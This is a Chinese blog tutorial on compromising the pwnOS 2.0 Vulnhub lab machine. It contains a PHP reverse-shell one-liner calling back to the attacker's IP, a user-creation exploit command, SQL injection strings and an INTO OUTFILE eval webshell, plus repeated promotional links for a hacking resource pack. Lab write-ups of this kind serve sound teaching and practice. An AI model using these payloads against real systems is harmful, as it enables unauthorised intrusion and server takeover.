当前位置: 首页 > article >正文

【网络安全渗透测试零基础入门】之Vulnhub靶场PWNOS: 2.0 多种渗透方法,收藏这一篇就够了!

前言

这是小强给粉丝盆友们整理的网络安全渗透测试入门阶段Vulnhub靶场实战教程

喜欢的朋友们,记得给我点赞支持和收藏一下,关注我,学习黑客技术。

本文介绍靶机PWNOS: 2.0 的渗透方法,由于靶机系统比较老,尝试了几种不同的角度获得shell和提权。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

1 环境搭建

根据提示信息,需要将网段设置为10.10.10.0/24,靶机ip为10.10.10.100。可以配置仅主机模式或NAT模式网卡,建议使用NAT模式。

本文采用仅主机模式实验:

然后将攻击机(kali2022)和靶机的网卡都设置为VMnet1。

在攻击机中手动设置ip地址:

ifconfig eth0 10.10.10.128 netmask 255.255.255.0  

然后ping一下靶机,确保能连接:

ping -c 4 10.10.10.100  

2 端口扫描

扫描开放端口以及靶机的系统信息

nmap -sV -p- -A 10.10.10.100  

发现开放了http和ssh服务,后续可以先从网站入手。内核版本为比较老的2.6.x。

尝试漏洞扫描:

nmap -sS 10.10.10.100 --script=vuln  

扫描出了两个地方可能有csrf漏洞,这里先不考虑。还有一些网站目录,后续可以访问看看内容。

3 渗透方法一:CMS系统漏洞

访问10.10.10.100/blog

页面像是某个cms系统,可以先用whatweb扫描一下

注意到框架:Simple PHP Blog 0.4.0

查看网页源码信息也可以看到。

直接搜索该框架的漏洞数据:

下面分别尝试这两种方法。

3.1 创建用户+文件上传

查看1191.pl的信息

关注使用方法,注意到第三个方法可以创建新用户。

利用脚本:

cp /usr/share/exploitdb/exploits/php/webapps/1191.pl /root  
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P 123  

成功创建了admin:123的用户。

使用创建的新用户登录

登录成功后在菜单中发现上传图片的按钮:

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

这里并没有对上传的文件做过滤,于是可以写入反弹连接的木马上传到服务器,反弹连接到kali的8888端口。

echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/8888 0>&1'\"); ?>" > shell.php  

通过猜测或者目录扫描,可以发现文件上传的目录为 http://10.10.10.100/blog/images/

先监听端口:

直接访问http://10.10.10.100/blog/images/shell.php。

成功拿到shell

3.2 使用msf利用RCE

打开msfconsole找到对应漏洞

设置攻击机和靶机的ip和URI即可。

成功获得shell

4 渗透方法二:SQL注入

本文使用手工sql注入的方法,使用bp浏览器访问登录页面,随便输入一个用户名密码抓包:

在repeater模块,修改email字段的值为1’

此时发现sql语句报错的信息,说明此处存在sql注入。

采用’ union select 1 – - 的方式不断增加列数,直到回显信息不再报错为止。

' union select 1 -- -   
' union select 1,2 -- -   
...  
' union select 1,2,3,4,5,6,7,8 -- - 

一直到第8列,回显信息有Welcome 4,第4个字段可能是可利用字段,把它改成version()试试能不能回显版本信息。

结果发现能看到版本信息,于是可以通过这个注入点搜集数据库各种信息。

通过sql注入在根目录下写入一句话木马:

' union select null,null,null,"<?php @eval($_POST['123']); ?>",null,null,null,null into outfile '/var/www/ok.php' -- - 

用蚁剑连接

5 提权

拿到shell后,查看var目录下的文件:

发现文件mysqli_connect.php,可能是个数据库配置文件,查看该文件:

直接用这个密码登录系统root用户,发现可以成功登录

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~


http://www.kler.cn/a/394855.html

相关文章:

  • 《传染病与人类历史》传染病如何推动人类历史进程
  • 记录一次前端绘画海报的过程及遇到的几个问题
  • 【VScode】第三方GPT编程工具-CodeMoss安装教程
  • 洛谷 P1014:Cantor 表
  • 在JavaScript中,let 和 const有什么不同
  • H5 与 WebView 的双向通信实现详解
  • Rust 所有权机制
  • MacBook 下载vscode不能被解压及打开的解决方案
  • Oracle19C AWR报告分析之Instance Efficiency Percentages (Target 100%)
  • A tour of Go - Web Crawler
  • tomcat配合geoserver安装及使用
  • 【Elasticsearch】Elasticsearch集成Spring Boot
  • 7天用Go从零实现分布式缓存GeeCache(学习)(5)
  • 巧妙注入的奥秘:在 Spring 中优雅地使用 List 和 Map
  • 【SpringBoot】20 同步调用、异步调用、异步回调
  • 【学习】【HTML】块级元素,行内元素,行内块级元素
  • macos 搭建自己的git pages
  • awk是一种在 Linux 和 Unix 系统中非常强大且常用的文本处理工具
  • Linux( 权限+特殊权限 图片+大白话)
  • macOS系统下使用SQLark连接达梦数据库
  • flutter插件:录制系统播放的声音
  • Docker compose部署portainer
  • 【Python进阶】Python中的数据库交互:ORM技术与SQLAlchemy
  • 国产系统给在线的Word文件创建表格
  • unity3d————接口基础知识点
  • STM32 创建一个工程文件(寄存器、标准库)